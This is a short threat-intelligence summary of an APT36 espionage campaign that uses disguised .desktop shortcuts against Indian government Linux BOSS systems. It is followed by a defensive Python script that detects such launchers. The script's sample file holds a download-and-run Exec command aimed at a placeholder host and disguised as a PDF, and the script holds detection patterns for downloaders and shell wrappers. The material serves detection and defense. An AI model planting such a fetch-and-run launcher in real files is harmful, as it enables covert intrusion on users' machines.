A well-known Pakistan-based threat group, APT36, has launched a sophisticated cyber-espionage campaign targeting Indian government agencies, focusing on the Linux BOSS operating system. The campaign uses spear-phishing emails with disguised payloads, demonstrating the group's evolving tactics for bypassing traditional security measures. #APT36 #LinuxBOSSPayloads
Key points
- APT36 has shifted its focus to target Linux BOSS, an Indian government-specific operating system.
- The campaign starts with spear-phishing emails containing weaponized archive files with disguised .desktop shortcuts.
- The .desktop files execute commands to download and run malicious payloads while tricking victims with decoy PDFs.
- Malware communicates with suspicious domains like securestore[.]cv and modgovindia[.]space for C2 operations.
- The group continues to evolve, using multi-platform strategies to maintain persistent espionage and exfiltrate data.
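As an added example (not from the original report or the campaign's own files), the following Python triage helper parses a .desktop file and flags the pattern described above: a launcher whose Name or Icon poses as a document while its Exec line wraps a shell command that downloads and runs something from a temporary path. The sample .desktop contents, the placeholder.invalid URL and the indicator names are constructed for illustration.

```python
import configparser
import re

# Constructed sample .desktop contents (hypothetical, not the campaign's files):
# one shortcut posing as a PDF whose Exec fetches and runs a payload, one benign launcher.
SAMPLES = {
    "Report.pdf.desktop": (
        "[Desktop Entry]\nType=Application\nName=Report.pdf\nIcon=application-pdf\n"
        "Terminal=false\n"
        'Exec=sh -c "curl -fsSL http://placeholder.invalid/p -o /tmp/.p; '
        'chmod +x /tmp/.p; /tmp/.p & xdg-open /tmp/decoy.pdf"\n'
    ),
    "editor.desktop": "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nIcon=gedit\n",
}

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
SHELL_WRAPPER = re.compile(r"\b(sh|bash|dash)\s+-c\b")
CHAINING = re.compile(r"(;|&&|\|\||\|)")
TEMP_PATH = re.compile(r"/(tmp|dev/shm|var/tmp)/")
DOC_NAME = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)$", re.IGNORECASE)
DOC_ICON = re.compile(r"(pdf|document|office|libreoffice)", re.IGNORECASE)

def analyze_desktop(text):
    """Return (suspicious, indicators) for the contents of one .desktop file."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # keep key case: Exec, Name, Icon
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return False, ["not-a-desktop-entry"]
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    name, icon = entry.get("Name", ""), entry.get("Icon", "")
    indicators = []
    if DOWNLOADER.search(exec_line):
        indicators.append("exec-downloads-content")
    if SHELL_WRAPPER.search(exec_line):
        indicators.append("exec-shell-wrapper")
    if CHAINING.search(exec_line):
        indicators.append("exec-chains-commands")
    if TEMP_PATH.search(exec_line):
        indicators.append("exec-uses-temp-path")
    if DOC_NAME.search(name) or DOC_ICON.search(icon):
        indicators.append("document-masquerade")
    exec_hits = [i for i in indicators if i.startswith("exec-")]
    # A launcher that looks like a document but runs shell or download logic matches
    # the lure described above; a download in Exec alone is enough to warrant review.
    suspicious = "exec-downloads-content" in indicators or (
        "document-masquerade" in indicators and bool(exec_hits))
    return suspicious, indicators

if __name__ == "__main__":
    for fname, content in SAMPLES.items():
        print(fname, analyze_desktop(content))
```

Run it over the .desktop entries extracted from a suspicious archive; a hit on the masquerade plus any Exec indicator is the combination worth escalating, while ordinary application launchers produce no indicators.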